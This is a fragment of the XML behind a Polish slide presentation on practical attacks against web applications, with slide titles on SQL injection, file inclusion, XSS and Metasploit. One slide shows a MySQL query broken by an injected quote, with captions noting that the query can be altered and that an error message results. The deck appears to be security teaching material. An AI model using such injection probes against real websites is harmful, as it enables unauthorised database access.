              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>)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4784"/>
            <a:ext cx="8229600" cy="1335151"/>
          </a:xfr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&lt;adam@adamziaja.com&gt;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23528" y="3049796"/>
            <a:ext cx="8525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SELECT * FROM `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>` WHERE `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pages_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>= '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>LIMIT 1</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Łącznik prosty ze strzałką 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7380312" y="3573016"/>
            <a:ext cx="0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1403648" y="4077072"/>
            <a:ext cx="7639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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w tym miejscu możemy zmodyfikować zapytanie do bazy danych </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Łącznik prosty ze strzałką 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="755576" y="2708920"/>
            <a:ext cx="0" cy="2376264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467544" y="5075892"/>
            <a:ext cx="7181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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…komunikat o błędzie w zapytaniu SQL zwrócony przez bazę danych </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL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395536" y="2276872"/>
            <a:ext cx="8280920" cy="36004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1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1498</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Pokaz na ekranie (4:3)</PresentationFormat>
  <Paragraphs>218</Paragraphs>
  <Slides>42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42</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="43" baseType="lpstr">
      <vt:lpstr>Motyw pakietu Office</vt:lpstr>
      <vt:lpstr>Adam Ziaja &lt;adam@adamziaja.com&gt; http://adamziaja.com</vt:lpstr>
      <vt:lpstr>Adam Ziaja, OSCP http://adamziaja.com</vt:lpstr>
      <vt:lpstr>Informacje o prezentacji</vt:lpstr>
      <vt:lpstr>Jeden z najsłabszych punktów bezpieczeństwa IT</vt:lpstr>
      <vt:lpstr>Ataki na strony rządowe dokonywane m.in. przez Anonymous Poland</vt:lpstr>
      <vt:lpstr>Google Hacking Database (GHDB)</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Metasploit Framework (MSF)</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>SQL Injection w życiu codziennym</vt:lpstr>
      <vt:lpstr>SQL Injection w życiu codziennym</vt:lpstr>
      <vt:lpstr>Remote File Inclusion (RFI)</vt:lpstr>
      <vt:lpstr>Local File Inclusion (LFI)</vt:lpstr>
      <vt:lpstr>Local File Inclusion (LFI)</vt:lpstr>
      <vt:lpstr>Local File Inclusion (LFI)</vt:lpstr>
      <vt:lpstr>Local File Inclusion (LFI)</vt:lpstr>
      <vt:lpstr>Bezpieczeństwo aplikacji webowych to nie tylko ataki po stronie serwera, ale również ataki client-side (po stronie klienta), w których atakowany jest bezpośrednio klient.</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>XSS payload (ładunek)</vt:lpstr>
      <vt:lpstr>XSS, możliwości m.in.:</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Przykładowy scenariusz ataku (w przypadku podatności XSS na routerze)</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Atak z wykorzystaniem MSF</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Podsumowanie</vt:lpstr>
      <vt:lpstr>Prezentacja programu PowerPoint</vt:lpstr>
      <vt:lpstr>Podsumowanie</vt:lpstr>
      <vt:lpstr>Jak żyć?</vt:lpstr>
      <vt:lpstr>Czy trzeba w ogóle się znać, aby się włamać?</vt:lpstr>
      <vt:lpstr>Adam Ziaja &lt;adam@adamziaja.com&gt; http://adamziaja.com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Praktyczne ataki na aplikacje webowe</dc:title>
  <dc:creator>Adam Ziaja</dc:creator>
  <cp:lastModifiedBy>Adam</cp:lastModifiedBy>
  <cp:revision>517</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-18T14:22:14Z</dcterms:modified>
</cp:coreProperties>
</file>